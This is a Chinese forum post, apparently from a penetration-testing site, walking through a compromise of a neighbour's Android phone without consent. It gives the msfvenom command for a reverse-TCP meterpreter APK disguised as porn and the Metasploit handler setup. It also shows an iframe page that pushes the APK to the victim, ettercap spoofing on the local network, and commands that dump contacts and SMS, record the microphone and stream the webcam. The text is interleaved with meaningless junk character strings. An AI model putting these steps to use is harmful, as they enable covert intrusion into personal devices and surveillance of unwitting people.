五、msf+ettercap入侵邻居安卓手机
" S! n5 C. N+ D4 j7 Z首先启动msf
0 v5 u, [, i# \0 O1 Q3 i8 L/ |4 b 先用kali生成一个安卓木马,如下命令: , Z, u( B5 K) j8 @+ g1 Y1 a
$ N$ i1 s9 m) ` Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
% N/ |% Y) _) G/ `* w9 s& _3 k6 |" q" j' \* B2 V' O( J
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
: `; V' T# F, P. \" W4 i4 [ 然后进入msf
use exploit/multi/handler
9 U7 P, w6 a. J7 L. b+ m8 L! a1 Y: k- } ^) ]% u! q' R( k set payload android/meterpreter/reverse_tcp 6 P1 w' `) Y3 \# s( [
set LHOST 192.168.0.109 //ip为kaili的ip # Z1 F. Q5 j. M9 k* s7 m& d& K
. a7 h% E: w/ U0 g set LPORT 44444 //端口一定要与前面生成的木马的端口一致 - a" ]4 a7 _/ p0 _/ T# S
# h+ g/ k: w& e6 NExploit $ ^7 z" ]$ q& L5 M& h: g# {
$ L# \( ]( v/ A, r1 N
( O* y. }7 v" d: s8 V; L2 X
下面我们开启ettercap -G ( p7 o( P3 b( q% F4 `" I. Q
, m, ]2 B h* B! |5 q 我物理IP为
9 [% F- f9 z% Z& [+ s- Z, u+ r X* h$ k
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
下面我们来设置一下
3 I; K/ r8 s" l. [$ L6 `. K5 M5 T. I% ], U0 ]
8 ?# S: o: J: `1 e- b8 K
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, $ ~* `' g' Q; x( I( ^# C9 E& ~
, ~+ G! S" l& }" K% B- }6 d" ~+ b* n5 Y* u: t
& g o5 z2 c! G5 ]
) g6 H* m* D6 {$ r; v' {
4 q+ b4 K1 j* x
9 z/ o! ?5 b# D, i/ Z. u/ x2 _
) e& V: b4 {7 ~9 W
% t1 j6 h9 j h7 X' R/ f
) b* n% e7 G4 t4 K# C, C0 e c ' w# y- T& {+ L% c- e( ?4 v3 p
% q" j4 x* U! e3 U$ M
& o. {3 f& |2 S+ F% S# F$ o
2 A9 u. O" W6 u, B. ?, k. m2 e U5 [* M8 }5 X. g9 _ 6 Q' c$ l/ [% |: U7 `5 O
/ [6 ~, Y5 d' A2 p, t) ^- h P. Q* D1 s: V: X- e
/ N( g! w* i& j" A6 p
下面我们开始攻击 / B1 D* ^& }' p
7 ?7 @4 l, L, w, b( B! x1 H; `: n9 `( { Q; g( r
& c5 j+ z- @4 X; V: U# r7 ^. ]4 r5 X9 R9 \# Y
2 V% T8 T6 g4 A' t6 y7 C% R; b
6 D! V; g2 U. G5 `6 l- w
% x5 s) K0 G' `/ x. T
8 Z$ x. o* O' b9 _
8 U3 V) l. N/ C) ?6 z) `! y 大概过了5分钟多,发现反弹成功了
: h) s4 T4 R1 J
- w2 M: M1 T/ V' }, ~( y. \, J/ n6 I- {
) I! |7 `0 N* e0 {1 Q
3 V( s- v: u8 E8 |! n- |
执行命令
! S. f& c6 Z: C- E$ G9 |8 X
. M- \, Y L5 z$ g& V3 A7 O1 P4 Z+ y: x: s dump_contacts --》这个是导出电话 7 N& j4 u+ i$ q/ {
2 j. l" b! ]) r! C# C/ J# e$ r# d" m& r p) n dump_sms --》这个是导出信息 ( S( }1 |, | Z) q* p
/ w* R' A2 F; _; c7 |7 Q" Q* ~% \$ f& j9 l. z; W- u" y record_mic Record audio from the default microphone for X seconds
7 j" e6 \/ [: S0 l, ~webcam_chat Start a video chat
" ?9 k. D4 ?2 a' K4 _; ~- ywebcam_list List webcams $ E) X0 M9 W3 H" H0 l/ O
, r% _2 i& _% |. p! I; N& K webcam_snap Take a snapshot from the specified webcam ' I3 ]! A$ D8 p5 k
c" g5 F0 `/ A# l+ R
webcam_stream  
lay a video stream from the specified webcam
" K8 s' Y1 T7 }, y
+ R& J. _. v6 l" x' n/ [ 我们打开看一下电话薄,
- T6 O2 t0 t; \4 U4 V" E! J) C" J! `& w. X! v; Z4 m
$ p. W0 t, h& U& f1 u. O2 V; F A
( r6 f+ z) A* y% |, ^
) j7 y9 q! H* z! E $ G) X9 I' Q8 D' x% x
( j! ~! E( D& o+ J. D
6 m2 F. F+ [$ b! K3 u8 E8 b/ [
* I8 O: Y* `+ B# U5 F, k
- A5 S% Y+ S3 y 我们同时欺骗成DroidJack木马,使用方法如图: & s) L6 G% ]+ n3 `" @
8 H; [/ u ^6 {8 M, x* b
, W& A" U; ? G- s$ }! S
; L9 D1 m+ d# [$ U1 U. E& f
1 R9 d0 Y' l t& }! S" M9 u 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
& |: P0 F) S: A: J1 D& s ?; B
; h8 ]0 Z) ]$ }" w2 m; Y
! |# ~0 e# |2 L F
# O, n; a* ]( c! G5 r

5 ?* I$ T& e& t, n3 T! k
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |